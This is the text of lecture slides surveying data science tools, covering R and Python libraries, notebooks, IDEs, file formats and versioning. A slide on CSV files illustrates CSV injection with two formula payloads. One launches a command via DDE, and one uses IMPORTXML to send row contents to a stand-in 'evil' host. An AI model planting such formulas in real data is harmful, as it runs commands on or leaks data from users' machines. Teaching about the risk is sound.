Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview

In-memory analytics Python and More on visualization The road to big data Notebooks and development environments A word on file formats A word on packaging and versioning systems

2 In-memory analytics

3 The landscape is incredibly complex

4 Heard about Hadoop? Spark? H2O?

Many vendors with their "big data and analytics" stack

Amazon There's always "roll your own" Cloudera Open source, or walled garden? Datameer Support? DataStax What's up to date? Dell Which features? Oracle IBM MapR Pentaho Databricks Microsoft Hortonworks EMC2

5 Two sides emerge

Infrastructure

"Big Data" "Integration" "Architecture" "Streaming"

6 Two sides emerge

Analytics

"Data Science" "Machine Learning" "AI"

7 There's a difference

8 In-memory analytics

Your data set fits in memory The assumption of many tools SAS, SPSS, MatLAB R, Python, Julia Is this really a problem? Servers with 512GB of RAM have become relatively cheap Cheaper than a HDFS cluster Implementation makes a difference (representation of data set in memory) If your task is unsupervised or supervised modeling, you can apply sampling Some algorithms can work in online / batch mode

9 Python and R

10 The big two

The "big two" in modern data science: Python and R Both have their advantages Others are interesting too (e.g. Julia), but less adopted Not (really) due to the language itself Thanks to their huge ecosystem: many packages for data science available Vendors such as SAS and SPSS remain as well But bleeding-edge algorithms or techniques found in open-source first

11 Analytics with R

Native concept of a "data frame": a table in which each column contains measurements on one variable, and each row contains one case Unlike an array, the data you store in the columns of a data frame can be of various types I.e., one column might be a numeric variable, another might be a factor, and a third might be a character variable. All columns have to be the same length (contain the same number of data items, although some of those data items may be missing values)

12 Analytics with R

Standard data frames are not very efficient

data.table : fast aggregation of large data (e.g. 100GB in RAM), fast ordered joins, fast add/modify/delete of columns by group using no copies at all, list columns, a fast friendly file reader

DT[i, j, by] # Subset rows using `i`, then calculate `j`, grouped by `` ## R: i j by ## SQL: where select | update group by

# How can we get the average arrival and departure delay # for each (orig,dest) pair and each month # for carrier code “AA”?

ans <- flights[carrier == "AA", .(m_arr = mean(arr_delay), mean(m_dep = dep_delay)), by = .(origin, dest, month)]

# origin dest month m_arr m_dep # 1: JFK LAX 1 6.590361 14.2289157 # 2: LGA PBI 1 -7.758621 0.3103448 # ... # 200: JFK DCA 10 16.483871 15.5161290 13 Analytics with R

R is great thanks to its ecosystem

Hadley Wickham: Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University Data Science “

ggplot2 for visualising data

for manipulating data

tidyr for tidying data

stringr for working with strings

lubridate for working with date/times https://www.tidyverse.org/ Data Import

readr for reading .csv and fwf files

readxl for reading .xls and .xlsx files

haven for SAS, SPSS, and files (also: “foreign” package)

httr for talking to web APIs

rvest for scraping websites

xml2 for importing XML files

Concept of "tidy" data and operations 14 Analytics with R

head(arrange(select(flights, year, month, day), desc(year)))

Can also be written as

flights %>% select(year, month, day) %>% arrange(desc(year)) %>% head

Similar to Unix pipe operator

Great way to fluently express data wrangling operations

Note: dplyr can even connect to relational databases and will convert data operations to SQL

One way to solve the big data issue!

15 Analytics with R

delay <- flights %>% group_by(tailnum) %>% summarise(count = n(), dist = mean(distance, na.rm = TRUE), delay = mean(arr_delay, na.rm = TRUE))

delay %>% filter(count > 20, dist < 2000) %>% ggplot(aes(dist, delay)) + geom_point(aes(size = count), alpha = 1/2) + geom_smooth() + scale_size_area()

Also see: https://www.rstudio.com/resources/cheatsheets/ 16 Analytics with R

Modeling in R

Virtually any unsupervised or supervised algorithm is implemented in R as a package

The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for: data splitting pre-processing feature selection model tuning using resampling variable importance estimation (Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface) You can just use the original package as well if you know what you want

17 Analytics with R

require(caret) require(ggplot2) require(randomForest)

training <- read.csv("train.csv", na.strings=c("NA","")) test <- read.csv("test.csv", na.strings=c("NA",""))

# Invoke caret with random forest and 5-fold cross validation rf_model <- train(TARGET~., data=training, method="rf", trControl=trainControl(method="cv",number=5), ntree=500) # Other parameters can be passed here

print(rf_model) ## Random Forest ## ## 5889 samples ## 53 predictors ## 5 classes: 'A', 'B', 'C', 'D', 'E' ## ## No pre-processing ## Resampling: Cross-Validated (5 fold) ## ## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712 ## ## Resampling results across tuning parameters: ## ## mtry Accuracy Kappa Accuracy SD Kappa SD ## 2 1 1 0.006 0.008 ## 27 1 1 0.005 0.006 ## 53 1 1 0.006 0.007 ## ## Accuracy was used to select the optimal model using the largest value. ## The final value used for the model was mtry = 27. 18 Analytics with R

print(rf_model$finalModel) ## ## Call: ## randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE, ## allowParallel = TRUE) ## Type of random forest: classification ## Number of trees: 500 ## No. of variables tried at each split: 27 ## ## OOB estimate of error rate: 0.88% ## Confusion matrix: ## A B C D E class.error ## A 1674 0 0 0 0 0.00000 ## B 11 1119 9 1 0 0.01842 ## C 0 11 1015 1 0 0.01168 ## D 0 2 10 952 1 0.01347 ## E 0 1 0 5 1077 0.00554

19 Analytics with R

The mlr package is an alternative to caret

R does not define a standardized interface for all its machine learning algorithms Therefore, for any non-trivial experiments, you need to write lengthy, tedious and error-prone wrappers to call the different algorithms and unify their respective output Additionally you need to implement infrastructure to resample your models, optimize hyperparameters, select features, cope with pre- and post-processing of data and compare models in a statistically meaningful way The “mlr” package provides this infrastructure so that you can focus on your experiments The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering It is written in a way that you can extend it yourself or deviate from the implemented convenience methods and construct your own complex experiments or algorithms The package is nicely connected to the OpenML and its online platform, which aims at supporting collaborative machine learning online and allows to easily share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research

Newer, though gaining uptake

20 Analytics with R

The modelr package provides functions that help you create elegant pipelines when modelling

More recent By Mainly for simple regression models only for now

More information: http://r4ds.had.co.nz/

Modern R approach Starts simple – linear and visual models Great introduction!

21 Visualizations with R

ggplot2 reigns supreme By Hadley Wickham Uses a “grammar of graphics” approach A grammar of graphics is a tool that enables us to concisely describe the components of a graphic An abstraction which makes thinking, reasoning and communicating graphics easier Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics Original idea: Wilkinson (2006)

ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs) Also declaratively describes data graphics Different render targets Interactivity: interact in browser, phone, … http://ggvis.rstudio.com/ 22 Visualizations with R

shiny : a web application framework for R

Construct interactive dashboards

23 Other packages worth noting

Apart from those mentioned elsewhere...

janitor : tools for cleaning data

foreign : read in SAS data

stringr : work with text

lubridate : work with times and dates

ROCR : make ROC and other curves (or verification , or pROC , or mltools )

MICE : handle missing data (or naniar )

ROSE : up/down sampling with SMOTE

forecast : time series analysis (or prophet )

leaflet : make maps

igraph : social network analysis

esquisse : drag and drop ggplot2 plot builder (Tableau-style)

assertr : assertions on data

24 Analytics with Python

Python itself is not a statistical / scientific language

SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering

NumPy is the fundamental package for scientific computing with Python A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, … “Let’s make Python’s arrays fast”

is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language Python’s “data frame”, uses NumPy

matplotlib : comprehensive 2d plotting SciPy library: fundamental library for scientific computing

25 Analytics with Python

import pandas as pd import numpy as np

df.sort_values(by='B')

A B C D 2013-01-03 -0.861849 -2.104569 -0.494929 1.071804 2013-01-04 0.721555 -0.706771 -1.039575 0.271860 2013-01-01 0.469112 -0.282863 -1.509059 -1.135632 2013-01-02 1.212112 -0.173215 0.119209 -1.044236 2013-01-06 -0.673690 0.113648 -1.478427 0.524988 2013-01-05 -0.424972 0.567020 0.276232 -1.087401

26 Analytics with Python

NumPy itself is clean and very well documented...

Pandas' API is a bit of a mess

"Minimally Sufficient Pandas": https://medium.com/dunder-data/minimally-sufficient-pandas- a8e67f2a2428

E.g. on the different ways to index:

.loc is primarily label based ( dataframe.loc['a'] ), but may also be used with a boolean array .loc will raise KeyError when the items are not found .iloc is primarily integer position based (from 0 to length-1 of the axis) .ix supports mixed integer and label based access Similarly to .loc, .at provides label based scalar lookups, while, .iat provides integer based lookups analogously to .iloc

Oh, and you can still do dataframe.a or dataframe['a']

If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however, df[1] gives an error and df[[1]] gives the second column

There are packages like dplython and pandas-ply , though not widely used

27 Analytics with Python

Modeling offers a better picture

scikit-learn is uncontested in the Python ecosystem Simple and efficient tools for data mining and data analysis Accessible to everybody, and reusable in various contexts Built on NumPy, SciPy, and matplotlib Open source, commercially usable - BSD license Lots of algorithms implemented

statsmodels Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests, and statistical data exploration

28 Analytics with Python

from sklearn.datasets import load_iris from sklearn.ensemble import RandomForestClassifier import pandas as pd import numpy as np

iris = load_iris() df = pd.DataFrame(iris.data, columns=iris.feature_names) df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75 df['species'] = pd.Factor(iris.target, iris.target_names)

train, test = df[df['is_train'] == True], df[df['is_train'] == False]

features = df.columns[:4] clf = RandomForestClassifier(n_jobs=2) y, _ = pd.factorize(train['species']) clf.fit(train[features], y)

preds = iris.target_names[clf.predict(test[features])] pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])

29 Analytics with Python

For some things you'll have to look elsewhere

“scikit-learn tries to provide a unified API for the basic tasks in machine learning, with pipelines and meta-algorithms like grid search to tie everything together” The required concepts, APIs, algorithms and expertise required for structured learning are different from what scikit-learn has to offer

pystruct handles general structured learning

seqlearn handles sequences only

surprise for recommender engines

statsmodels for time series Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing. However, neither of these fit within the design constraints of scikit-learn Basic CPU-based artificial neural networks are present, however Good support to work with textual data though – i.e. many featurization options

30 Visualizations with Python

matplotlib : the foundation

seaborn : “If matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too”

Others:

ggplot : Python implementation of ggplot2. Not a “feature-for-feature port of ggplot2,” but there’s strong feature overlap

Altair : newer library with “pleasant API”

bokey : another interesting library

Nice comparison at: https://dansaber.wordpress.com/2016/10/02/a-dramatic- tour-through-pythons-data-visualization-landscape-including-ggplot-and-altair/

31 Other packages worth noting

Apart from those mentioned elsewhere...

imbalanced-learn : up/down sampling with SMOTE

plotnine : another ggplot -style Python plotting tool

tqdm : human friendly progress bars

yellowbrick : general purpose ML visualizations

missingno : handle missing data

dateparser : handling dates in various formats

pyflux : time series analysis (or prophet , or tsfresh )

great_expectations : assertions on data

folium : mapping library

And there are interops packages to work between R and Python as well

32 More on visualization

33 Packaged software and BI

Apart from the libraries mentioned above, there's also packaged ("business intelligence" software)

E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, ... Just “use” the tool, no hastle of coding and debugging Ease-of-use Limited in functionality Custom design more difficult Has nothing to do with modeling

34 Packaged software and BI

Although niche visualization can require niche tools

E.g. process mining: (Disco and friends) Web analytics (Google, Adobe, SAS) Graph visualizations: Gephi, NodeXL, sigma.js Mapping (Leaflet, Folium, others)

35 Further libraries to be aware of

d3.js : Javascript-library which made famous the concept of “data-driven” documents D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document For example, you can use D3 to generate an HTML table from an array of numbers. Or, use the same data to create an interactive SVG bar chart with smooth transitions and interaction Direct coupling between data and visualization: changing the data changes the visualisation See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/

Graphviz: diagram and graph visualizations (serves as the "engine" in many other tools)

Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)

36 The road to big data

37 On-GPU analytics, deep learning

Ecosystem mainly based on Python (R, Java, Lua too, though less so) Keras, TensorFlow, PyTorch as the current leaders, with dozens of other libraries: Caffe 2, Torch, Chainer, mxnet, CNTK, … Hardware support mainly based on NVIDIA GPU’s with CUDA SDK Linux mainly (but Windows support is getting better)

Training data can be very large (a million images, for instance), but not (commonly) stored or used in distributed fashion

"Epoch“: one iteration of training. For small data sets: exposing a learning algorithm to the entire set of training data (the “batch”) "Minibatch" means that the gradient is calculated across a sample before updating weights Can be done in-memory Computation can be distributed: often involves distribution over multiple GPUs, though somewhat separate approaches than Hadoop and friends, e.g. Apache mxnet – and often comes with bottlenecks when used in a networked fashion (distributed often happens by using multiple GPU’s in one machine)

38 On-disk analytics

Even if your data set exceeds the boundaries of memory, there might be an easier way around it rather than full distributed setups: the "itermediate" step before going full "big data"

Use a database and SQL Memory-mapped files (i.e. “disk-scratching”)

ff or bigmemory in R (but not that fun)

disk.frame : a great new package! (https://github.com/xiaodaigh/disk.frame)

Dask in Python, similar API as pandas Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) ("Modin is a DataFrame designed for datasets from 1KB to 1TB+")

vaex (https://github.com/vaexio/vaex) (works with huge tabular data, process more than a billion rows/second) Dato (Turi) used to have a great implementation, open source as Sframe (https://github.com/turi-code/SFrame) and in https://github.com/apple/turicreate -- also worth checking out

39 On-disk analytics

import pandas as pd import dask.dataframe as dd df = pd.read_csv('2015-01-01.csv') df = dd.read_csv('2015-*-*.csv') df.groupby(df.user_id).value.mean() df.groupby(df.user_id).value.mean().compute()

import graphlab import graphlab.aggregate as agg sf = graphlab.SFrame.read_csv('2018-01-01.csv') sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})

Careful with this, though. You can end up with Pandas, Dask and Spark “ “ code in one spaghetti bowl. Guess how I found that out...

Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above

It could have been solved with a bunch of servers and a (distributed) on-disk library Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially "rediscovered" by Spark as a way to forego MapReduce, something we'll talk about later

"Pandas is crashing because I'm trying to work with a 50GB data set" is not an excuse any more 40 Notebooks and development environments

41 Notebooks

Scientific programing in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results

It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing Notebooks are collaborative web-based environments for data exploration and visualization Similar to a “lab notebook”

The idea of computer notebooks has been around for a long time, starting with the early days of MatLAB and Mathematica in the mid-to-late-80s.

Later: SageMath and IPython Today: Jupyter, Beaker, Zeppelin

42 Notebooks

43 Notebooks

The Sage Notebook was released on 24 February 2005 by William Stein

Professor of mathematics at the University of Washington Free and open source software (GNU License), with the initial goal of creating an “open source alternative to Magma, , Mathematica, and MATLAB” Sage is based on Python and focuses on mathematical worksheets Today: not widely used, outdated

44 Notebooks

The IPython console was started by Fernando Perez circa 2001

From a first attempt to replicate a Mathematica Notebook with 259 lines of code With the Sage Notebook being a reference, Fernando Perez had many collaborations with the Sage team

45 Notebooks

In 2015, the IPython Notebook project became the Jupyter project

The foundation for a generation of scientific publications focused on reproducibility by making the data and the code accessible and open The ability to go beyond Python and run several languages in a notebook is also at the center of the Jupyter rebirth Multilingualism is still limited, however. It is not possible to have multiple cells with multiple languages within the same notebook. Furthermore, in order to run notebooks in languages other than Python, you still need to install additional ”kernels” A kernel provides programming language support in Jupyter. IPython is the default kernel Additional kernels include R, Julia, and many more Impressive success and steady growth since 2011 In the past year, the number of ipynb files on github has nearly tripled

46 Notebooks

47 Notebooks

Other alternatives:

Apache Zeppelin: similar in concept to Jupyter Apache Zeppelin is build on the JVM while Jupyter is built on Python Zeppelin offers the possibility to mix languages across cells. Zeppelin currently supports Scala (with ), Python (with Apache Spark), SparkSQL, Hive, Markdown and Shell Zeppelin is fully oriented for Spark. It is data exploration and visualization intended for big data and large scale projects. Of course you can use pyspark in a Jupyter Notebook, but Zeppelin is natively Spark See also: “Spark Notebook”: http://spark-notebook.io/ (less used) Was originally implemented as they way forward by many Spark-based vendor stacks, though today, we see that Jupyter is the most popular environment, so that most stacks are, or have continued to, including Jupyter Beaker: designed from the start to be a fully polyglot notebook. It currently supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb Nice idea of mixing languages in the same notebook, but has not really gone anywhere nteract: for those of you that like to have Jupyter installed as a desktop app Includes easier ways for styling

48 Notebooks

Jupyter comes with a lot of benefits

Quick iteration, immediate output shown in the notebook Easy to construct "dynamic" reports, applying style sheets You can even make them interactive (i.e. through the use of widgets) Many extensions to adjust your workflow "Jupyter Hub" to host a multi user Jupyter environment

49 Notebooks

But come with a set of issues as well...

Version control can be problematic Jupyter stores notebooks as one big JSON file, including inputs and outputs Every time you make a change, need to commit the whole file Code can only be run block-by-block (cell by cell) Can easily mess up flow of code (non-linear execution) You end up with a notebook, which has newer results above the older results Code can end up looking fragmented People start splitting the chunks and forget to put them back together, lose track of the order of the analysis and it all ends up in a big mess Does not encourage to write modular code You end up copying code fragments from older, other people's notebooks “Executing” a notebook can be difficult Reproducibility Export to Python, R? Some notebooks offer execution possibilities

50 Notebooks

https://www.reddit.com/r/Python/comments/9aoi35/i_dont_like_notebooks_joel_grus_jupyterc on_2018/ https://yihui.name/en/2018/09/notebook-war/ 1. Hidden state and out-of-order execution 2. Notebooks are difficult for beginners 3. Notebooks encourage bad habits 4. Notebooks discourage modularity and testing 5. Jupyter’s autocomplete, linting, and way of looking up the help are awkward 6. Notebooks encourage bad processes 7. Notebooks hinder reproducible + extensible science 8. Notebooks make it hard to copy and paste into Slack/Github issues 9. Errors will always halt execution 10. Notebooks make it easy to teach poorly 11. Notebooks make it hard to teach well 51 Notebooks

https://colab.research.google.com

52 Notebooks

https://studio.azureml.net/

53 Notebooks

But come with a set of issues as well...

Version control can be problematic Fixed in many hosted environments Collaboration possible as well Possible to "roll your own", e.g. through the use of "git hooks" Code can only be run block-by-block (cell by cell) Enforce strict guidelines Does not encourage to write modular code Harder to solve, enforce guidelines, but allow people to work on this “Executing” a notebook can be difficult Solution exist to overcome this as well

The takeaway? Notebooks are here to stay

Great tool for exploration, experimentation, development phase of data science, even for showing results in “report” form But additional processes / skills required Modularization, using a real IDE, software development principles! If not: “throw it over the wall projects” where they hit the wall of deployment! 54 IDEs

Integrated development environment

Commonly offers much better debugging, code inspection, documentation capabilities RStudio for R On desktop Or hosted on web server (commercial) Support for Git and others Authoring reports, slide shows Interactive visualizations Rodeo for Python Copies look and feel of Rstudio Similar: Spyder Or IDEs such as PyCharm Jupyter Lab Builds on top of Jupyter Adds panel layout, file view A work in progress but fixed a lot of Jupyter’s issues!

55 IDEs

https://www.rstudio.com/

56 IDEs

https://rodeo.yhat.com/ 57 IDEs

https://www.jetbrains.com/pycharm/

58 IDEs

https://github.com/jupyterlab/jupyterlab 59 Getting started

Python

Anaconda Distribution: https://www.continuum.io/downloads Includes Jupyter, Python, data science package repository (also for R)

R

CRAN (base installation): https://cran.r-project.org/ RStudio: https://www.rstudio.com/ Or Jupyter

Hosted ("one click Jupyter")

https://studio.azureml.net/ (free) https://colab.research.google.com (free) Kaggle Kernels (free) Crestle ($0.30 an hour) Paperspace Gradient ($0.59 an hour) Floydhub ($1.20/hour) Salamander ($0.38 an hour) SageMaker, Google Compute Platform, EC2, Digitalocean... and install yourself 60 A word on file formats

61 In which format do we store our data?

You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:

How fast is it to serialize data (write)? How fast can it be read in? How large is it? Column or row based? Easy to distribute? Easy to modify schema?

62 Text based formats

CSV, TSV, JSON, XML Convenient to exchange with other applications or scripts Human readable Bulky and not efficient to query without reading whole structure in memory first Hard to infer schema Compression applies on file-level Still one of the most common formats

63 Text based formats

UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client, "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240 http://georgemauer.net/2017/10/07/csv-injection.html

64 Text based formats

65 Sequence files

A persistent data structure for binary key-value pairs “Serialized Java objects” Row-based Commonly used to transfer data in map-reduce jobs (see later) Compression applies on row level Less popular in recent years, not portable

66 Optimized Row Columnar (ROW)

Evolution of RCFile Stores collections of rows and within the collection the data is stored in columnar format (combination of row- and column-based) Lightweight indexing Splittable Less popular in recent years

67

Widely used as serialization format Row-based, compact binary format Schema is included in the file Supports schema evolution Add, rename and delete columns Compression on record level https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data- interchange/

68

Column-oriented binary file format Efficient when specific columns are queried Common in data science Parquet is built to support very efficient compression and encoding schemes Parquet allows compression schemes to be specified on a per-column level Good support for schema evolution Can add columns at the end

69 SQLite files

Row-oriented file stores Support for multiple tables, schema evolution, SQL querying Integrates nicely with many languages Data sets can become very large

70 HDF5

HDF5 is a data model, library, and file format for storing and managing data Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5 A file system within a file Specification is very complex

71 Kudo

Kudu is a storage system for tables of structured data Tables have a well-defined schema consisting of a predefined number of typed columns. Each table has a primary key composed of one or more of its columns Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called Tablets Kudu provides data durability and protection against hardware failure by replicating these Tablets to multiple commodity hardware nodes

72 Apache Arrow

Engineers from across the community are collaborating to establish Arrow as a de-facto standard for columnar in-memory processing and interchange Apache Arrow is an in-memory data structure specification for use by engineers building data systems A columnar memory-layout permitting O(1) random access The layout is highly cache-efficient in analytics workloads Not a binary file specification, but a memory representation specification Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads

73 Feather

A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow

“ "One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations,

they share a very similar semantic model" “

“ In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from feather to design a very fast file format for storing data frames that could be used by both languages. Thus,

the Feather format was born “

74 Feather

Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames. It has a few specific design goals:

Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible Language agnostic: Feather files are the same whether written by Python or R code. Other languages can read and write Feather files, too High read and write performance. When possible, Feather operations should be bound by local disk performance

library(feather) path <- "my_data.feather" write_feather(df, path) df <- read_feather(path)

# Analogously, in Python, we have: import feather path = 'my_data.feather' feather.write_dataframe(df, path) df = feather.read_dataframe(path) 75 Feather

“Feather is one of the first projects to bring the tangible benefits of the Arrow spec to users in the form of an efficient, language-agnostic representation of tabular data on disk Since Arrow does not provide for a file format, we are using Google’s Flatbuffers library (github.com/google/flatbuffers) to serialize column types and related metadata in a language- independent way in the file”

76 What to take away from this?

Be prepared to deal with different data sources

AVRO is fast to serialize (write, dump) data and supports schema evolution: great choice for ETL and integration Parquet and Feather are fast to read, query, and analyse data

Future: Arrow/Feather + Parquet

Feather is not designed for long-term data storage. At this time, we do not guarantee that the file format will be stable between versions Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis Feather is extremely fast. Since Feather does not currently use any compression internally, it works best when used with solid-state drives as come with most of today’s laptop computers Many organisations are adopting a hybrid approach

77 A word on packaging and versioning systems

78 Packaging

You'll commonly encounter "package managers" when working in your preferred ecosystem

“ A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs for a computer's operating

system in a consistent manner. “

Clean, simple installs and updates Avoiding conflicts Resolving dependencies

79 Virtual environments

This is commonly combined with a way to set up "virtual environments": isolated subsystems, each with their own packages

The idea is to make your environment reproducible Avoid the "runs on my computer" syndrome

80 In Python and R

R comes with each own package management system, allows to download packages from a repository

E.g. install.packages(...)

Virtual environments can be set up using packrat

Python has had a lot of package managers, but the most common one nowadays is pip Included with Python 3 by default Included with the Anaconda distribution

pip install numpy

Virtual environments can be set up using virtualenv

Or you can use conda : Anaconda's package manager and virtual environment manager in-one Includes more than just Python packages, also R and other tools are included Hence also allows to set up clean isolated R workspaces Good rule of thumb: a new conda environment for each project https://conda.io/projects/conda/en/latest/user-guide/getting-started.html

To isolate a complete environment, virtualization and containerization tools like docker are commonly used as well

81 Versioning systems

Something else to read up on is the use of version control systems

“ Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of database. If a mistake is made, developers can turn back the clock and compare earlier versions of the code to help fix the mistake while

minimizing disruption to all team members. “

Even a good idea to use this for a "team of one" SVN, CVN, Mercurial, Bazaar

Most common one is git , however

82 git

“ Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial

development. “

“ As with most other distributed version-control systems, and unlike most client–server systems, every Git directory on every computer is a full- fledged repository with complete history and full version-tracking

abilities, independent of network access or a central server. “

Git is free and open-source software distributed under the terms of the “ “ GNU General Public License version 2.

GitHub: hosts git repositories for you (free) GitLab: an alternative

83 git

84 git

A good way to practice is to put your coding, data science projects, blog even on GitHub

E.g. feel free to try this for Assignment 2

Many data science recruiters will look at your GitHub profile to see the (personal) projects you've worked and collaborated on

85